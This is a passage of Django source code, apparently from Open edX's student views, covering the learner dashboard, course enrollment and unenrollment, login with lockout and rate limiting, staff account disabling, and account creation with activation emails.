redirect_message = _("The course you are looking for is closed for enrollment as of {date}.").format(
date=request.GET['course_closed']
)
else:
redirect_message = ''
context = {
'enrollment_message': enrollment_message,
'redirect_message': redirect_message,
'course_enrollments': course_enrollments,
'course_optouts': course_optouts,
'message': message,
'staff_access': staff_access,
'errored_courses': errored_courses,
'show_courseware_links_for': show_courseware_links_for,
'all_course_modes': course_mode_info,
'cert_statuses': cert_statuses,
'credit_statuses': _credit_statuses(user, course_enrollments),
'show_email_settings_for': show_email_settings_for,
'reverifications': reverifications,
'verification_status': verification_status,
'verification_status_by_course': verify_status_by_course,
'verification_msg': verification_msg,
'show_refund_option_for': show_refund_option_for,
'block_courses': block_courses,
'denied_banner': denied_banner,
'billing_email': settings.PAYMENT_SUPPORT_EMAIL,
'user': user,
'logout_url': reverse('logout'),
'platform_name': platform_name,
'enrolled_courses_either_paid': enrolled_courses_either_paid,
'provider_states': [],
'order_history_list': order_history_list,
'courses_requirements_not_met': courses_requirements_not_met,
'nav_hidden': True,
'programs_by_run': programs_by_run,
'show_program_listing': ProgramsApiConfig.current().show_program_listing,
'disable_courseware_js': True,
}
ecommerce_service = EcommerceService()
if ecommerce_service.is_enabled(request.user):
context.update({
'use_ecommerce_payment_flow': True,
'ecommerce_payment_page': ecommerce_service.payment_page_url(),
})
return render_to_response('dashboard.html', context)
def _create_recent_enrollment_message(course_enrollments, course_modes): # pylint: disable=invalid-name
"""
Builds a recent course enrollment message.
Constructs a new message template based on any recent course enrollments
for the student.
Args:
course_enrollments (list[CourseEnrollment]): a list of course enrollments.
course_modes (dict): Mapping of course ID's to course mode dictionaries.
Returns:
A string representing the HTML message output from the message template.
None if there are no recently enrolled courses.
"""
recently_enrolled_courses = _get_recently_enrolled_courses(course_enrollments)
if recently_enrolled_courses:
enroll_messages = [
{
"course_id": enrollment.course_overview.id,
"course_name": enrollment.course_overview.display_name,
"allow_donation": _allow_donation(course_modes, enrollment.course_overview.id, enrollment)
}
for enrollment in recently_enrolled_courses
]
platform_name = configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
return render_to_string(
'enrollment/course_enrollment_message.html',
{'course_enrollment_messages': enroll_messages, 'platform_name': platform_name}
)
def _get_recently_enrolled_courses(course_enrollments):
"""
Given a list of enrollments, filter out all but recent enrollments.
Args:
course_enrollments (list[CourseEnrollment]): A list of course enrollments.
Returns:
list[CourseEnrollment]: A list of recent course enrollments.
"""
seconds = DashboardConfiguration.current().recent_enrollment_time_delta
time_delta = (datetime.datetime.now(UTC) - datetime.timedelta(seconds=seconds))
return [
enrollment for enrollment in course_enrollments
# If the enrollment has no created date, we are explicitly excluding the course
# from the list of recent enrollments.
if enrollment.is_active and enrollment.created > time_delta
]
def _allow_donation(course_modes, course_id, enrollment):
"""Determines if the dashboard will request donations for the given course.
Check if donations are configured for the platform, and if the current course is accepting donations.
Args:
course_modes (dict): Mapping of course ID's to course mode dictionaries.
course_id (str): The unique identifier for the course.
enrollment(CourseEnrollment): The enrollment object in which the user is enrolled
Returns:
True if the course is allowing donations.
"""
if course_id not in course_modes:
flat_unexpired_modes = {
unicode(course_id): [mode for mode in modes]
for course_id, modes in course_modes.iteritems()
}
flat_all_modes = {
unicode(course_id): [mode.slug for mode in modes]
for course_id, modes in CourseMode.all_modes_for_courses([course_id]).iteritems()
}
log.error(
u'Can not find `%s` in course modes.`%s`. All modes: `%s`',
course_id,
flat_unexpired_modes,
flat_all_modes
)
donations_enabled = DonationConfiguration.current().enabled
return (
donations_enabled and
enrollment.mode in course_modes[course_id] and
course_modes[course_id][enrollment.mode].min_price == 0
)
def _update_email_opt_in(request, org):
"""Helper function used to hit the profile API if email opt-in is enabled."""
email_opt_in = request.POST.get('email_opt_in')
if email_opt_in is not None:
email_opt_in_boolean = email_opt_in == 'true'
preferences_api.update_email_opt_in(request.user, org, email_opt_in_boolean)
def _credit_statuses(user, course_enrollments):
"""
Retrieve the status for credit courses.
A credit course is a course for which a user can purchased
college credit. The current flow is:
1. User becomes eligible for credit (submits verifications, passes the course, etc.)
2. User purchases credit from a particular credit provider.
3. User requests credit from the provider, usually creating an account on the provider's site.
4. The credit provider notifies us whether the user's request for credit has been accepted or rejected.
The dashboard is responsible for communicating the user's state in this flow.
Arguments:
user (User): The currently logged-in user.
course_enrollments (list[CourseEnrollment]): List of enrollments for the
user.
Returns: dict
The returned dictionary has keys that are `CourseKey`s and values that
are dictionaries with:
* eligible (bool): True if the user is eligible for credit in this course.
* deadline (datetime): The deadline for purchasing and requesting credit for this course.
* purchased (bool): Whether the user has purchased credit for this course.
* provider_name (string): The display name of the credit provider.
* provider_status_url (string): A URL the user can visit to check on their credit request status.
* request_status (string): Either "pending", "approved", or "rejected"
* error (bool): If true, an unexpected error occurred when retrieving the credit status,
so the user should contact the support team.
Example:
>>> _credit_statuses(user, course_enrollments)
{
CourseKey.from_string("edX/DemoX/Demo_Course"): {
"course_key": "edX/DemoX/Demo_Course",
"eligible": True,
"deadline": 2015-11-23 00:00:00 UTC,
"purchased": True,
"provider_name": "Hogwarts",
"provider_status_url": "http://example.com/status",
"request_status": "pending",
"error": False
}
}
"""
from openedx.core.djangoapps.credit import api as credit_api
# Feature flag off
if not settings.FEATURES.get("ENABLE_CREDIT_ELIGIBILITY"):
return {}
request_status_by_course = {
request["course_key"]: request["status"]
for request in credit_api.get_credit_requests_for_user(user.username)
}
credit_enrollments = {
enrollment.course_id: enrollment
for enrollment in course_enrollments
if enrollment.mode == "credit"
}
# When a user purchases credit in a course, the user's enrollment
# mode is set to "credit" and an enrollment attribute is set
# with the ID of the credit provider. We retrieve *all* such attributes
# here to minimize the number of database queries.
purchased_credit_providers = {
attribute.enrollment.course_id: attribute.value
for attribute in CourseEnrollmentAttribute.objects.filter(
namespace="credit",
name="provider_id",
enrollment__in=credit_enrollments.values()
).select_related("enrollment")
}
provider_info_by_id = {
provider["id"]: provider
for provider in credit_api.get_credit_providers()
}
statuses = {}
for eligibility in credit_api.get_eligibilities_for_user(user.username):
course_key = CourseKey.from_string(unicode(eligibility["course_key"]))
providers_names = get_credit_provider_display_names(course_key)
status = {
"course_key": unicode(course_key),
"eligible": True,
"deadline": eligibility["deadline"],
"purchased": course_key in credit_enrollments,
"provider_name": make_providers_strings(providers_names),
"provider_status_url": None,
"provider_id": None,
"request_status": request_status_by_course.get(course_key),
"error": False,
}
# If the user has purchased credit, then include information about the credit
# provider from which the user purchased credit.
# We retrieve the provider's ID from the an "enrollment attribute" set on the user's
# enrollment when the user's order for credit is fulfilled by the E-Commerce service.
if status["purchased"]:
provider_id = purchased_credit_providers.get(course_key)
if provider_id is None:
status["error"] = True
log.error(
u"Could not find credit provider associated with credit enrollment "
u"for user %s in course %s. The user will not be able to see his or her "
u"credit request status on the student dashboard. This attribute should "
u"have been set when the user purchased credit in the course.",
user.id, course_key
)
else:
provider_info = provider_info_by_id.get(provider_id, {})
status["provider_name"] = provider_info.get("display_name")
status["provider_status_url"] = provider_info.get("status_url")
status["provider_id"] = provider_id
statuses[course_key] = status
return statuses
@transaction.non_atomic_requests
@require_POST
@outer_atomic(read_committed=True)
def change_enrollment(request, check_access=True):
"""
Modify the enrollment status for the logged-in user.
TODO: This is lms specific and does not belong in common code.
The request parameter must be a POST request (other methods return 405)
that specifies course_id and enrollment_action parameters. If course_id or
enrollment_action is not specified, if course_id is not valid, if
enrollment_action is something other than "enroll" or "unenroll", if
enrollment_action is "enroll" and enrollment is closed for the course, or
if enrollment_action is "unenroll" and the user is not enrolled in the
course, a 400 error will be returned. If the user is not logged in, 403
will be returned; it is important that only this case return 403 so the
front end can redirect the user to a registration or login page when this
happens. This function should only be called from an AJAX request, so
the error messages in the responses should never actually be user-visible.
Args:
request (`Request`): The Django request object
Keyword Args:
check_access (boolean): If True, we check that an accessible course actually
exists for the given course_key before we enroll the student.
The default is set to False to avoid breaking legacy code or
code with non-standard flows (ex. beta tester invitations), but
for any standard enrollment flow you probably want this to be True.
Returns:
Response
"""
# Get the user
user = request.user
# Ensure the user is authenticated
if not user.is_authenticated():
return HttpResponseForbidden()
# Ensure we received a course_id
action = request.POST.get("enrollment_action")
if 'course_id' not in request.POST:
return HttpResponseBadRequest(_("Course id not specified"))
try:
course_id = SlashSeparatedCourseKey.from_deprecated_string(request.POST.get("course_id"))
except InvalidKeyError:
log.warning(
u"User %s tried to %s with invalid course id: %s",
user.username,
action,
request.POST.get("course_id"),
)
return HttpResponseBadRequest(_("Invalid course id"))
if action == "enroll":
# Make sure the course exists
# We don't do this check on unenroll, or a bad course id can't be unenrolled from
if not modulestore().has_course(course_id):
log.warning(
u"User %s tried to enroll in non-existent course %s",
user.username,
course_id
)
return HttpResponseBadRequest(_("Course id is invalid"))
# Record the user's email opt-in preference
if settings.FEATURES.get('ENABLE_MKTG_EMAIL_OPT_IN'):
_update_email_opt_in(request, course_id.org)
available_modes = CourseMode.modes_for_course_dict(course_id)
# Check whether the user is blocked from enrolling in this course
# This can occur if the user's IP is on a global blacklist
# or if the user is enrolling in a country in which the course
# is not available.
redirect_url = embargo_api.redirect_if_blocked(
course_id, user=user, ip_address=get_ip(request),
url=request.path
)
if redirect_url:
return HttpResponse(redirect_url)
# Check that auto enrollment is allowed for this course
# (= the course is NOT behind a paywall)
if CourseMode.can_auto_enroll(course_id):
# Enroll the user using the default mode (audit)
# We're assuming that users of the course enrollment table
# will NOT try to look up the course enrollment model
# by its slug. If they do, it's possible (based on the state of the database)
# for no such model to exist, even though we've set the enrollment type
# to "audit".
try:
enroll_mode = CourseMode.auto_enroll_mode(course_id, available_modes)
if enroll_mode:
CourseEnrollment.enroll(user, course_id, check_access=check_access, mode=enroll_mode)
except Exception: # pylint: disable=broad-except
return HttpResponseBadRequest(_("Could not enroll"))
# If we have more than one course mode or professional ed is enabled,
# then send the user to the choose your track page.
# (In the case of no-id-professional/professional ed, this will redirect to a page that
# funnels users directly into the verification / payment flow)
if CourseMode.has_verified_mode(available_modes) or CourseMode.has_professional_mode(available_modes):
return HttpResponse(
reverse("course_modes_choose", kwargs={'course_id': unicode(course_id)})
)
# Otherwise, there is only one mode available (the default)
return HttpResponse()
elif action == "unenroll":
enrollment = CourseEnrollment.get_enrollment(user, course_id)
if not enrollment:
return HttpResponseBadRequest(_("You are not enrolled in this course"))
certificate_info = cert_info(user, enrollment.course_overview, enrollment.mode)
if certificate_info.get('status') in DISABLE_UNENROLL_CERT_STATES:
return HttpResponseBadRequest(_("Your certificate prevents you from unenrolling from this course"))
CourseEnrollment.unenroll(user, course_id)
return HttpResponse()
else:
return HttpResponseBadRequest(_("Enrollment action is invalid"))
# Need different levels of logging
@ensure_csrf_cookie
def login_user(request, error=""): # pylint: disable=too-many-statements,unused-argument
"""AJAX request to log in the user."""
backend_name = None
email = None
password = None
redirect_url = None
response = None
running_pipeline = None
third_party_auth_requested = third_party_auth.is_enabled() and pipeline.running(request)
third_party_auth_successful = False
trumped_by_first_party_auth = bool(request.POST.get('email')) or bool(request.POST.get('password'))
user = None
platform_name = configuration_helpers.get_value("platform_name", settings.PLATFORM_NAME)
if third_party_auth_requested and not trumped_by_first_party_auth:
# The user has already authenticated via third-party auth and has not
# asked to do first party auth by supplying a username or password. We
# now want to put them through the same logging and cookie calculation
# logic as with first-party auth.
running_pipeline = pipeline.get(request)
username = running_pipeline['kwargs'].get('username')
backend_name = running_pipeline['backend']
third_party_uid = running_pipeline['kwargs']['uid']
requested_provider = provider.Registry.get_from_pipeline(running_pipeline)
try:
user = pipeline.get_authenticated_user(requested_provider, username, third_party_uid)
third_party_auth_successful = True
except User.DoesNotExist:
AUDIT_LOG.warning(
u"Login failed - user with username {username} has no social auth "
"with backend_name {backend_name}".format(
username=username, backend_name=backend_name)
)
message = _(
"You've successfully logged into your {provider_name} account, "
"but this account isn't linked with an {platform_name} account yet."
).format(
platform_name=platform_name,
provider_name=requested_provider.name,
)
message += "<br/><br/>"
message += _(
"Use your {platform_name} username and password to log into {platform_name} below, "
"and then link your {platform_name} account with {provider_name} from your dashboard."
).format(
platform_name=platform_name,
provider_name=requested_provider.name,
)
message += "<br/><br/>"
message += _(
"If you don't have an {platform_name} account yet, "
"click <strong>Register</strong> at the top of the page."
).format(
platform_name=platform_name
)
return HttpResponse(message, content_type="text/plain", status=403)
else:
if 'email' not in request.POST or 'password' not in request.POST:
return JsonResponse({
"success": False,
# TODO: User error message
"value": _('There was an error receiving your login information. Please email us.'),
}) # TODO: this should be status code 400
email = request.POST['email']
password = request.POST['password']
try:
user = User.objects.get(email=email)
except User.DoesNotExist:
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
AUDIT_LOG.warning(u"Login failed - Unknown user email")
else:
AUDIT_LOG.warning(u"Login failed - Unknown user email: {0}".format(email))
# check if the user has a linked shibboleth account, if so, redirect the user to shib-login
# This behavior is pretty much like what gmail does for shibboleth. Try entering some @stanford.edu
# address into the Gmail login.
if settings.FEATURES.get('AUTH_USE_SHIB') and user:
try:
eamap = ExternalAuthMap.objects.get(user=user)
if eamap.external_domain.startswith(openedx.core.djangoapps.external_auth.views.SHIBBOLETH_DOMAIN_PREFIX):
return JsonResponse({
"success": False,
"redirect": reverse('shib-login'),
}) # TODO: this should be status code 301 # pylint: disable=fixme
except ExternalAuthMap.DoesNotExist:
# This is actually the common case, logging in user without external linked login
AUDIT_LOG.info(u"User %s w/o external auth attempting login", user)
# see if account has been locked out due to excessive login failures
user_found_by_email_lookup = user
if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
if LoginFailures.is_user_locked_out(user_found_by_email_lookup):
lockout_message = _('This account has been temporarily locked due '
'to excessive login failures. Try again later.')
return JsonResponse({
"success": False,
"value": lockout_message,
}) # TODO: this should be status code 429 # pylint: disable=fixme
# see if the user must reset his/her password due to any policy settings
if user_found_by_email_lookup and PasswordHistory.should_user_reset_password_now(user_found_by_email_lookup):
return JsonResponse({
"success": False,
"value": _('Your password has expired due to password policy on this account. You must '
'reset your password before you can log in again. Please click the '
'"Forgot Password" link on this page to reset your password before logging in again.'),
}) # TODO: this should be status code 403 # pylint: disable=fixme
# if the user doesn't exist, we want to set the username to an invalid
# username so that authentication is guaranteed to fail and we can take
# advantage of the ratelimited backend
username = user.username if user else ""
if not third_party_auth_successful:
try:
user = authenticate(username=username, password=password, request=request)
# this occurs when there are too many attempts from the same IP address
except RateLimitException:
return JsonResponse({
"success": False,
"value": _('Too many failed login attempts. Try again later.'),
}) # TODO: this should be status code 429 # pylint: disable=fixme
if user is None:
# tick the failed login counters if the user exists in the database
if user_found_by_email_lookup and LoginFailures.is_feature_enabled():
LoginFailures.increment_lockout_counter(user_found_by_email_lookup)
# if we didn't find this username earlier, the account for this email
# doesn't exist, and doesn't have a corresponding password
if username != "":
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
loggable_id = user_found_by_email_lookup.id if user_found_by_email_lookup else "<unknown>"
AUDIT_LOG.warning(u"Login failed - password for user.id: {0} is invalid".format(loggable_id))
else:
AUDIT_LOG.warning(u"Login failed - password for {0} is invalid".format(email))
return JsonResponse({
"success": False,
"value": _('Email or password is incorrect.'),
}) # TODO: this should be status code 400 # pylint: disable=fixme
# successful login, clear failed login attempts counters, if applicable
if LoginFailures.is_feature_enabled():
LoginFailures.clear_lockout_counter(user)
# Track the user's sign in
if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
tracking_context = tracker.get_tracker().resolve_context()
analytics.identify(
user.id,
{
'email': email,
'username': username
},
{
# Disable MailChimp because we don't want to update the user's email
# and username in MailChimp on every page load. We only need to capture
# this data on registration/activation.
'MailChimp': False
}
)
analytics.track(
user.id,
"edx.bi.user.account.authenticated",
{
'category': "conversion",
'label': request.POST.get('course_id'),
'provider': None
},
context={
'ip': tracking_context.get('ip'),
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
)
if user is not None and user.is_active:
try:
# We do not log here, because we have a handler registered
# to perform logging on successful logins.
login(request, user)
if request.POST.get('remember') == 'true':
request.session.set_expiry(604800)
log.debug("Setting user session to never expire")
else:
request.session.set_expiry(0)
except Exception as exc: # pylint: disable=broad-except
AUDIT_LOG.critical("Login failed - Could not create session. Is memcached running?")
log.critical("Login failed - Could not create session. Is memcached running?")
log.exception(exc)
raise
redirect_url = None # The AJAX method calling should know the default destination upon success
if third_party_auth_successful:
redirect_url = pipeline.get_complete_url(backend_name)
response = JsonResponse({
"success": True,
"redirect_url": redirect_url,
})
# Ensure that the external marketing site can
# detect that the user is logged in.
return set_logged_in_cookies(request, response, user)
if settings.FEATURES['SQUELCH_PII_IN_LOGS']:
AUDIT_LOG.warning(u"Login failed - Account not active for user.id: {0}, resending activation".format(user.id))
else:
AUDIT_LOG.warning(u"Login failed - Account not active for user {0}, resending activation".format(username))
reactivation_email_for_user(user)
not_activated_msg = _("Before you sign in, you need to activate your account. We have sent you an "
"email message with instructions for activating your account.")
return JsonResponse({
"success": False,
"value": not_activated_msg,
}) # TODO: this should be status code 400 # pylint: disable=fixme
@csrf_exempt
@require_POST
@social_utils.strategy("social:complete")
def login_oauth_token(request, backend):
"""
Authenticate the client using an OAuth access token by using the token to
retrieve information from a third party and matching that information to an
existing user.
"""
warnings.warn("Please use AccessTokenExchangeView instead.", DeprecationWarning)
backend = request.backend
if isinstance(backend, social_oauth.BaseOAuth1) or isinstance(backend, social_oauth.BaseOAuth2):
if "access_token" in request.POST:
# Tell third party auth pipeline that this is an API call
request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_LOGIN_API
user = None
try:
user = backend.do_auth(request.POST["access_token"])
except (HTTPError, AuthException):
pass
# do_auth can return a non-User object if it fails
if user and isinstance(user, User):
login(request, user)
return JsonResponse(status=204)
else:
# Ensure user does not re-enter the pipeline
request.social_strategy.clean_partial_pipeline()
return JsonResponse({"error": "invalid_token"}, status=401)
else:
return JsonResponse({"error": "invalid_request"}, status=400)
raise Http404
@require_GET
@login_required
@ensure_csrf_cookie
def manage_user_standing(request):
"""
Renders the view used to manage user standing. Also displays a table
of user accounts that have been disabled and who disabled them.
"""
if not request.user.is_staff:
raise Http404
all_disabled_accounts = UserStanding.objects.filter(
account_status=UserStanding.ACCOUNT_DISABLED
)
all_disabled_users = [standing.user for standing in all_disabled_accounts]
headers = ['username', 'account_changed_by']
rows = []
for user in all_disabled_users:
row = [user.username, user.standing.changed_by]
rows.append(row)
context = {'headers': headers, 'rows': rows}
return render_to_response("manage_user_standing.html", context)
@require_POST
@login_required
@ensure_csrf_cookie
def disable_account_ajax(request):
"""
Ajax call to change user standing. Endpoint of the form
in manage_user_standing.html
"""
if not request.user.is_staff:
raise Http404
username = request.POST.get('username')
context = {}
if username is None or username.strip() == '':
context['message'] = _('Please enter a username')
return JsonResponse(context, status=400)
account_action = request.POST.get('account_action')
if account_action is None:
context['message'] = _('Please choose an option')
return JsonResponse(context, status=400)
username = username.strip()
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
context['message'] = _("User with username {} does not exist").format(username)
return JsonResponse(context, status=400)
else:
user_account, _success = UserStanding.objects.get_or_create(
user=user, defaults={'changed_by': request.user},
)
if account_action == 'disable':
user_account.account_status = UserStanding.ACCOUNT_DISABLED
context['message'] = _("Successfully disabled {}'s account").format(username)
log.info(u"%s disabled %s's account", request.user, username)
elif account_action == 'reenable':
user_account.account_status = UserStanding.ACCOUNT_ENABLED
context['message'] = _("Successfully reenabled {}'s account").format(username)
log.info(u"%s reenabled %s's account", request.user, username)
else:
context['message'] = _("Unexpected account status")
return JsonResponse(context, status=400)
user_account.changed_by = request.user
user_account.standing_last_changed_at = datetime.datetime.now(UTC)
user_account.save()
return JsonResponse(context)
@login_required
@ensure_csrf_cookie
def change_setting(request):
"""JSON call to change a profile setting: Right now, location"""
# TODO (vshnayder): location is no longer used
u_prof = UserProfile.objects.get(user=request.user) # request.user.profile_cache
if 'location' in request.POST:
u_prof.location = request.POST['location']
u_prof.save()
return JsonResponse({
"success": True,
"location": u_prof.location,
})
class AccountValidationError(Exception):
def __init__(self, message, field):
super(AccountValidationError, self).__init__(message)
self.field = field
@receiver(post_save, sender=User)
def user_signup_handler(sender, **kwargs): # pylint: disable=unused-argument
"""
handler that saves the user Signup Source
when the user is created
"""
if 'created' in kwargs and kwargs['created']:
site = configuration_helpers.get_value('SITE_NAME')
if site:
user_signup_source = UserSignupSource(user=kwargs['instance'], site=site)
user_signup_source.save()
log.info(u'user {} originated from a white labeled "Microsite"'.format(kwargs['instance'].id))
def _do_create_account(form, custom_form=None):
"""
Given cleaned post variables, create the User and UserProfile objects, as well as the
registration for this user.
Returns a tuple (User, UserProfile, Registration).
Note: this function is also used for creating test users.
"""
errors = {}
errors.update(form.errors)
if custom_form:
errors.update(custom_form.errors)
if errors:
raise ValidationError(errors)
user = User(
username=form.cleaned_data["username"],
email=form.cleaned_data["email"],
is_active=False
)
user.set_password(form.cleaned_data["password"])
registration = Registration()
# TODO: Rearrange so that if part of the process fails, the whole process fails.
# Right now, we can have e.g. no registration e-mail sent out and a zombie account
try:
with transaction.atomic():
user.save()
if custom_form:
custom_model = custom_form.save(commit=False)
custom_model.user = user
custom_model.save()
except IntegrityError:
# Figure out the cause of the integrity error
if len(User.objects.filter(username=user.username)) > 0:
raise AccountValidationError(
_("An account with the Public Username '{username}' already exists.").format(username=user.username),
field="username"
)
elif len(User.objects.filter(email=user.email)) > 0:
raise AccountValidationError(
_("An account with the Email '{email}' already exists.").format(email=user.email),
field="email"
)
else:
raise
# add this account creation to password history
# NOTE, this will be a NOP unless the feature has been turned on in configuration
password_history_entry = PasswordHistory()
password_history_entry.create(user)
registration.register(user)
profile_fields = [
"name", "level_of_education", "gender", "mailing_address", "city", "country", "goals",
"year_of_birth"
]
profile = UserProfile(
user=user,
**{key: form.cleaned_data.get(key) for key in profile_fields}
)
extended_profile = form.cleaned_extended_profile
if extended_profile:
profile.meta = json.dumps(extended_profile)
try:
profile.save()
except Exception: # pylint: disable=broad-except
log.exception("UserProfile creation failed for user {id}.".format(id=user.id))
raise
return (user, profile, registration)
def create_account_with_params(request, params):
"""
Given a request and a dict of parameters (which may or may not have come
from the request), create an account for the requesting user, including
creating a comments service user object and sending an activation email.
This also takes external/third-party auth into account, updates that as
necessary, and authenticates the user for the request's session.
Does not return anything.
Raises AccountValidationError if an account with the username or email
specified by params already exists, or ValidationError if any of the given
parameters is invalid for any other reason.
Issues with this code:
* It is not transactional. If there is a failure part-way, an incomplete
account will be created and left in the database.
* Third-party auth passwords are not verified. There is a comment that
they are unused, but it would be helpful to have a sanity check that
they are sane.
* It is over 300 lines long (!) and includes disprate functionality, from
registration e-mails to all sorts of other things. It should be broken
up into semantically meaningful functions.
* The user-facing text is rather unfriendly (e.g. "Username must be a
minimum of two characters long" rather than "Please use a username of
at least two characters").
"""
# Copy params so we can modify it; we can't just do dict(params) because if
# params is request.POST, that results in a dict containing lists of values
params = dict(params.items())
# allow to define custom set of required/optional/hidden fields via configuration
extra_fields = configuration_helpers.get_value(
'REGISTRATION_EXTRA_FIELDS',
getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
)
# Boolean of whether a 3rd party auth provider and credentials were provided in
# the API so the newly created account can link with the 3rd party account.
#
# Note: this is orthogonal to the 3rd party authentication pipeline that occurs
# when the account is created via the browser and redirect URLs.
should_link_with_social_auth = third_party_auth.is_enabled() and 'provider' in params
if should_link_with_social_auth or (third_party_auth.is_enabled() and pipeline.running(request)):
params["password"] = pipeline.make_random_password()
# if doing signup for an external authorization, then get email, password, name from the eamap
# don't use the ones from the form, since the user could have hacked those
# unless originally we didn't get a valid email or name from the external auth
# TODO: We do not check whether these values meet all necessary criteria, such as email length
do_external_auth = 'ExternalAuthMap' in request.session
if do_external_auth:
eamap = request.session['ExternalAuthMap']
try:
validate_email(eamap.external_email)
params["email"] = eamap.external_email
except ValidationError:
pass
if eamap.external_name.strip() != '':
params["name"] = eamap.external_name
params["password"] = eamap.internal_password
log.debug(u'In create_account with external_auth: user = %s, email=%s', params["name"], params["email"])
extended_profile_fields = configuration_helpers.get_value('extended_profile_fields', [])
enforce_password_policy = (
settings.FEATURES.get("ENFORCE_PASSWORD_POLICY", False) and
not do_external_auth
)
# Can't have terms of service for certain SHIB users, like at Stanford
registration_fields = getattr(settings, 'REGISTRATION_EXTRA_FIELDS', {})
tos_required = (
registration_fields.get('terms_of_service') != 'hidden' or
registration_fields.get('honor_code') != 'hidden'
) and (
not settings.FEATURES.get("AUTH_USE_SHIB") or
not settings.FEATURES.get("SHIB_DISABLE_TOS") or
not do_external_auth or
not eamap.external_domain.startswith(openedx.core.djangoapps.external_auth.views.SHIBBOLETH_DOMAIN_PREFIX)
)
form = AccountCreationForm(
data=params,
extra_fields=extra_fields,
extended_profile_fields=extended_profile_fields,
enforce_username_neq_password=True,
enforce_password_policy=enforce_password_policy,
tos_required=tos_required,
)
custom_form = get_registration_extension_form(data=params)
# Perform operations within a transaction that are critical to account creation
with transaction.atomic():
# first, create the account
(user, profile, registration) = _do_create_account(form, custom_form)
# next, link the account with social auth, if provided via the API.
# (If the user is using the normal register page, the social auth pipeline does the linking, not this code)
if should_link_with_social_auth:
backend_name = params['provider']
request.social_strategy = social_utils.load_strategy(request)
redirect_uri = reverse('social:complete', args=(backend_name, ))
request.backend = social_utils.load_backend(request.social_strategy, backend_name, redirect_uri)
social_access_token = params.get('access_token')
if not social_access_token:
raise ValidationError({
'access_token': [
_("An access_token is required when passing value ({}) for provider.").format(
params['provider']
)
]
})
request.session[pipeline.AUTH_ENTRY_KEY] = pipeline.AUTH_ENTRY_REGISTER_API
pipeline_user = None
error_message = ""
try:
pipeline_user = request.backend.do_auth(social_access_token, user=user)
except AuthAlreadyAssociated:
error_message = _("The provided access_token is already associated with another user.")
except (HTTPError, AuthException):
error_message = _("The provided access_token is not valid.")
if not pipeline_user or not isinstance(pipeline_user, User):
# Ensure user does not re-enter the pipeline
request.social_strategy.clean_partial_pipeline()
raise ValidationError({'access_token': [error_message]})
# Perform operations that are non-critical parts of account creation
preferences_api.set_user_preference(user, LANGUAGE_KEY, get_language())
if settings.FEATURES.get('ENABLE_DISCUSSION_EMAIL_DIGEST'):
try:
enable_notifications(user)
except Exception: # pylint: disable=broad-except
log.exception("Enable discussion notifications failed for user {id}.".format(id=user.id))
dog_stats_api.increment("common.student.account_created")
# If the user is registering via 3rd party auth, track which provider they use
third_party_provider = None
running_pipeline = None
if third_party_auth.is_enabled() and pipeline.running(request):
running_pipeline = pipeline.get(request)
third_party_provider = provider.Registry.get_from_pipeline(running_pipeline)
# Track the user's registration
if hasattr(settings, 'LMS_SEGMENT_KEY') and settings.LMS_SEGMENT_KEY:
tracking_context = tracker.get_tracker().resolve_context()
identity_args = [
user.id, # pylint: disable=no-member
{
'email': user.email,
'username': user.username,
'name': profile.name,
# Mailchimp requires the age & yearOfBirth to be integers, we send a sane integer default if falsey.
'age': profile.age or -1,
'yearOfBirth': profile.year_of_birth or datetime.datetime.now(UTC).year,
'education': profile.level_of_education_display,
'address': profile.mailing_address,
'gender': profile.gender_display,
'country': unicode(profile.country),
}
]
if hasattr(settings, 'MAILCHIMP_NEW_USER_LIST_ID'):
identity_args.append({
"MailChimp": {
"listId": settings.MAILCHIMP_NEW_USER_LIST_ID
}
})
analytics.identify(*identity_args)
analytics.track(
user.id,
"edx.bi.user.account.registered",
{
'category': 'conversion',
'label': params.get('course_id'),
'provider': third_party_provider.name if third_party_provider else None
},
context={
'ip': tracking_context.get('ip'),
'Google Analytics': {
'clientId': tracking_context.get('client_id')
}
}
)
# Announce registration
REGISTER_USER.send(sender=None, user=user, profile=profile)
create_comments_service_user(user)
# Don't send email if we are:
#
# 1. Doing load testing.
# 2. Random user generation for other forms of testing.
# 3. External auth bypassing activation.
# 4. Have the platform configured to not require e-mail activation.
# 5. Registering a new user using a trusted third party provider (with skip_email_verification=True)
#
# Note that this feature is only tested as a flag set one way or
# the other for *new* systems. we need to be careful about
# changing settings on a running system to make sure no users are
# left in an inconsistent state (or doing a migration if they are).
send_email = (
not settings.FEATURES.get('SKIP_EMAIL_VALIDATION', None) and
not settings.FEATURES.get('AUTOMATIC_AUTH_FOR_TESTING') and
not (do_external_auth and settings.FEATURES.get('BYPASS_ACTIVATION_EMAIL_FOR_EXTAUTH')) and
not (
third_party_provider and third_party_provider.skip_email_verification and
user.email == running_pipeline['kwargs'].get('details', {}).get('email')
)
)
if send_email:
dest_addr = user.email
context = {
'name': profile.name,
'key': registration.activation_key,
}
# composes activation email
subject = render_to_string('emails/activation_email_subject.txt', context)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
message = render_to_string('emails/activation_email.txt', context)
from_address = configuration_helpers.get_value(
'email_from_address',
settings.DEFAULT_FROM_EMAIL
)
try:
if settings.FEATURES.get('REROUTE_ACTIVATION_EMAIL'):
dest_addr = settings.FEATURES['REROUTE_ACTIVATION_EMAIL']
message = ("Activation for %s (%s): %s\n" % (user, user.email, profile.name) +
'-' * 80 + '\n\n' + message)
mail.send_mail(subject, message, from_address, [dest_addr], fail_silently=False)
else:
user.email_user(subject, message, from_address)
except Exception: # pylint: disable=broad-except
log.error(
u'Unable to send activation email to user from "%s" to "%s"',
from_address,
dest_addr,
exc_info=True
)
else:
registration.activate()
_enroll_user_in_pending_courses(user) # Enroll student in any pending courses
# Immediately after a user creates an account, we log them in. They are only
# logged in until they close the browser. They can't log in again until they click
# the activation link from the email.
new_user = authenticate(username=user.username, password=params['password'])
login(request, new_user)
request.session.set_expiry(0)
try:
record_registration_attributions(request, new_user)
# Don't prevent a user from registering due to attribution errors.
except Exception: # pylint: disable=broad-except
log.exception('Error while attributing cookies to user registration.')
# TODO: there is no error checking here to see that the user actually logged in successfully,
# and is not yet an active user.
